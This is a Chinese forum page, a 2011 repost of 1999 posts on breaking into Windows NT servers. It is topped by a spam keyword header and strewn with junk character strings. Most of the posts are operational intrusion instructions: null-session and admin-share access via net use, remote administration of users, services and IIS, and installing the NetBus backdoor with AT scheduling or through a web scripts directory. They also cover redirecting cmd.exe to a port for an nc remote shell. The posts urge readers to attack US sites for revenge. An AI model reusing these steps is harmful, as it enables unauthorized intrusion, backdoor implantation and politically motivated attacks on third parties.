天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標題: 關于“怎樣進入NT主機”的幾點補充 [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-13 17:03
      
標題: 關于“怎樣進入NT主機”的幾點補充
      《版主頁黑客工具和文章的幾個問題》中提到:5 ]( m1 c; @6 M" g/ h$ @
      
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運行PINGER,設置好IP,點PING,彈出一個窗口(C++。。。),說出錯,然后關閉了,何故,是不是安裝有誤? 2。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學文章中提到需在WINNT4。0下運行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章,以提高我國黑客水平。' g: f2 E/ g. ], f/ A2 h
      
> 我的機子MMX166,WIN98,2。5G,32M內存。
      
1 n, G+ S1 I9 a4 m5 t
      
' U0 Z1 h. w  @* ~7 J& Q& }+ D黑客并不神秘,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點,輔助相關的工具,就可以成功。0 f$ [6 Y, K0 g2 A' @
      
你的問題是,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議,你一定要安裝NT,對于你的機器配制,和我們現(xiàn)在差不多,只是比你多了32M內存,2G硬盤。5 {" v) G% w$ F
      
其實,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務器,該服務器為NT4.0,我們將做如下簡單事情就有可能成功,假設目標NT的IP地址為111.111.111.111,做法如下:
      
  I% c& a/ q$ r1 K6 C" f# K/ H/ X# _net use \\111.111.111.111\ipc$ "" /user:""
      
& C1 s1 B( O9 o1 \4 B) I/ t" Fnet.exe是NT的工具文件,該命令將和目標服務器建立Null Session,如果成功,你可以查看該服務器上的共享目錄:; _) h* Z' e" v6 F
      
net view \\111.111.111.1114 p6 A/ O$ t, ~+ i9 O) g
      
當然,如果你有該NT管理員密碼,就更好辦了,假設其管理員Admin密碼為fuck:9 j" n. W( ?: R# ~6 I* f
      
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"6 \/ {( E; g7 b- u
      
命令成功后,幾乎所有目標NT上的配制,資源,你都可以在你本地NT上連接遠程計算機來查看或修改:
      
$ v0 O  \3 ?* l7 D1、查看或修改遠程機器上的硬盤,假如目標NT上有C、D兩個硬盤:( ^* D' s/ L- N& F0 M- B3 L9 o! w
      
net use x: \\111.111.111.111\c$1 k4 E: N: _, w) c7 Q5 P. ?( J" c5 R
      
net use y: \\111.111.111.111\d$+ N$ o) s6 S& b" A9 r. \4 i
      
這樣,目標NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...$ r$ T$ {: V# u8 V
      
2、管理目標NT的用戶:
      
+ S; k" n. P# k從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
      
' @: w3 X( y# J; X' C% _鍵入\\111.111.111.111后,目標NT上的所有用戶你想怎么做都可以,和管理你本地的一樣* Y4 g) c" n5 h# D
      
3、管理目標NT的服務
      
6 P% Z! `2 v5 b4 F選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”5 I, x, q/ i4 B4 t0 B
      
這樣你可以管理目標NT上的服務,共享目錄+ i7 I; x  t+ d3 s, q: ^4 G2 w
      
4、IIS管理$ O; q- x& _' P: l2 X& a
      
選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.111
      
. k: B$ X, H4 @* t1 F目標NT的FTP、WWW服務你就可以重新配置
      
* d+ V- C( K3 N) }5、事件管理
      
/ L& ~$ Y8 q1 v) B“事件查看器”->連接到服務器->111.111.111.111
      
  e' k. B( U2 p4 c0 r0 Q6 ]1 w# q/ B! Z* ]  \  {% @
      
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實現(xiàn)的。! D: X1 K1 y4 |1 _4 c8 _" B' M
      

      
/ w  t" |% R1 E0 r  J' T當然,98,95也能做一些事情,但很麻煩,比如:
      
- q* f6 d% S) s" t/ H. ^! Pnet use \\111.111.111.111\ipc$8 S! `8 d& l5 P. C0 q
      
net use z: \\111.111.111.111\d$$ U6 `. M! l/ m. {. ^
      
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當前用戶和密碼去登錄,如果你知道目標NT的用戶或密碼,重新啟動95, 98,改用該用戶和密碼登錄,方可實現(xiàn),你可以連接目標NT上的共享資源,但不能進行管理,如用戶、事件等
      
/ O* `, S4 J7 `$ y! _2 Z7 O
      
1 z1 ^; ]- G+ t" ?2 O/ [2 z我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點,花點時間,裝個NT吧,NT Workstation也可以!2 r8 s6 q; w; |5 [/ P+ y; b
      
這樣,你還可以了解目標機器上能有什么東東供你去用!: K4 z3 W) l" H" T" K
      

      
0 n# C- P4 }( K& u4 N: W, P- ]5 s- r, h5 R3 ~
      
--------------------------------------------------------------------------------/ N7 `+ x* {( T, O0 z
      
; h' ^+ }2 E& Q7 i
      
>quack于1999-06-12,23:37:44
      
, P: t/ X" [3 m# _( w在大作《幾個有關黑的問題》中提到:
      
; M# ]0 i$ h9 w) }" K% c7 X首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
      
7 ?! p- O  H: M3 s0 i& N2 R
      
+ ~) X3 W! f; E! c4 Pkillusa于1999-06-13,03:25:15
      
4 w4 x4 d3 ~  \在大作《Re: 幾個有關黑的問題》中提到:, N7 |4 _8 h; G+ d5 O9 u
      
3 i( W: A4 ^" n4 P3 ^1 T
      
letmein.exe 暫時沒有mypwd參數(shù),十分抱歉3 [/ g7 Q. y$ P$ G
      
pinger程序,只是利用ping來尋找主機,每臺NT服務器有一個主IP地址,但也可以設置多個輔助IP地址,比如有些服務器供應商,一臺NT服務器上可以設置一千多個IP,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址,所以有時顯示只有IP,而無主機名。另外,有些服務器是非NT的操作系統(tǒng),有時將不會顯示主機名。當然,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況。
      
2 G* T4 }# x3 E6 G( W8 [, {9 a
      
7 u* h* o6 U  ^0 v" [1 }Netbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序,所以,netbus.exe是不用上傳的,只需在目的$ Z4 S5 M  W1 }0 i3 J  p' t
      
服務器上運行ntsrv.exe,而在目的服務器運行該程序有很多種方法:: j4 F# q9 h- V
      

      
' k9 I' f8 S3 y; M& k1、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:; C9 i/ W4 Z, U& s6 A8 s
      

      
; j( V' U. W$ b, z- @# e8 J; {3 ZC:\>net start schedule
      
* p0 \( j' B5 _; k. qSchedule 正在啟動服務...../ {5 `/ c4 Z1 C% p& _4 ^' R; V
      
Schedulw 服務啟動成功。
      
' ?3 H& ?# z# u4 ?' QC:\>at /?; L! A4 A" ~2 }4 \" M
      
AT 命令排定在特定的日期和時間運行某些命令和程序。
      
" Y7 j2 N0 J& T3 e運行 AT 命令之前必須先啟動 Schedule 服務。
      
: A/ V& q2 R, }6 o2 k; I0 R
      
) l) ]& J6 S6 D$ z: PAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
      
' ]1 E% t+ Q' `3 y8 b3 f+ h9 ?AT [\\computername] time [/INTERACTIVE]( j$ z2 }5 F" Q
      
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
      
! B8 v5 j% k0 d! A1 N
      
( Z8 d, y/ w8 g# O9 R6 Z. M\\computername 指定遠程計算機。 如果省略這個參數(shù)/ l% z( b/ s& G0 G1 }0 T
      
命令會被排定在本機上運行。; n" J) H& I! V1 E# q! j7 ~1 p
      
id 指定給排定進度命令的識別號。
      
" Y- U$ k/ x. q- |- f; s6 a! h, s( ^9 X* T) u" @9 G8 v
      
/delete 刪除某個已排定進度的命令。如果省略標識,計算機上所有已排定進度的命令都會被刪除。8 A" \, ^( o( F" h( u" g6 e9 n
      
/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認信息 。
      
8 N3 p- G; c% V$ m: ltime 指定命令運行的時間。
      
5 Z0 h. I+ b2 G: X! |4 G/interactive 允許作業(yè)在運行時,與用戶通過桌面交互。
      
1 b4 L5 N  n. D6 b6 T6 m& B! L8 j0 |3 e0 `* n0 {+ f. O
      
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。
      
) t5 a1 z" b- h1 Z如果省略日期,則默認為在每月的本日運行。- R6 z2 f; |' l5 a
      

      
8 M& @% t; E! U' o+ I' E. k/next:date[,...] 指定在下一個指定日期 (如,下周三),運行命令。如果省略日期,則默認為在每月的本日運行。6 L0 P) P, w0 W! \
      
9 o* K2 Y9 Y  N4 U7 Y* ~
      
"command" 準備運行的 Windows NT 命令或批處理文件。
      
' h3 O+ t3 A5 |! \' _0 S4 R% \
      
% v# ~/ u! X' |3 f) Y$ rC:\># }/ p! F( |) |  r$ P
      

      
! h3 A( Y% `& F7 M$ I. f知道了如何使用AT,再來看看如何在遠程NT上運行ntsrv.exe:
      
: o# I- O; j4 A/ o1 利用管理員登陸到目的服務器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
      
% {' Z, r- o" [) n3 S/ U1 a4 k) w2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start
      
% t2 K7 n1 y/ W  G3 利用AT.EXE在遠程服務器設置程序定時運行,當然最快運行最理想,所以,你可以用letmein.exe得到服務器的時間,然后:
      
5 Y# a6 ~! G  \4 pat \\x.x.x.x 00:00 ntsrv.exe /port:64321$ q, q9 f$ ~# g
      
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后,再在本地啟動netbus.exe,鍵入目的服務器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務器運行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務器,再用netbus的"Start program",鍵入完整路徑的LEGION運行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務就啟動了,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
      
- T1 S8 @4 b: u5 A; MMicrosoft(R) Windows NT(TM)% r( i8 \7 G8 o) t1 P% b3 @1 i
      
(C) Copyright 1985-1996 Microsoft Corp.- O6 z6 k9 @- g" Y1 u
      
C:\>6 P* {3 t1 ?) K! F9 M1 V3 s, P
      

      
1 U+ }0 x( ~/ u/ V2、利用web啟動ntsrv.exe或其他程序在目的服務器9 [. x. a  z# N! p# C
      
* j3 _# g) W, q
      
將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
      
+ m5 `; o7 p2 Q( G& Ehttp://x.x.x.x/scripts/ntsrv.exe /port:643214 X5 I% F* y' U% c; ?* @) o; Z- M; R
      http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321  l6 k" S  s# M3 S8 W0 c. X  v' b
      
該程序就啟動了
      
7 j; `% {7 K& o, d5 I( A
      
" F9 j1 b* f. \, @  X我只提這幾中方法!! F  n* F5 p0 b! ]2 ~4 h
      
要成功,必須打好基礎工,對操作系統(tǒng)充分了解!
      
5 _5 [' L/ g5 V( v+ P2 [8 H
      
9 X) @' R) \" B9 r6 B; l* z. D




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5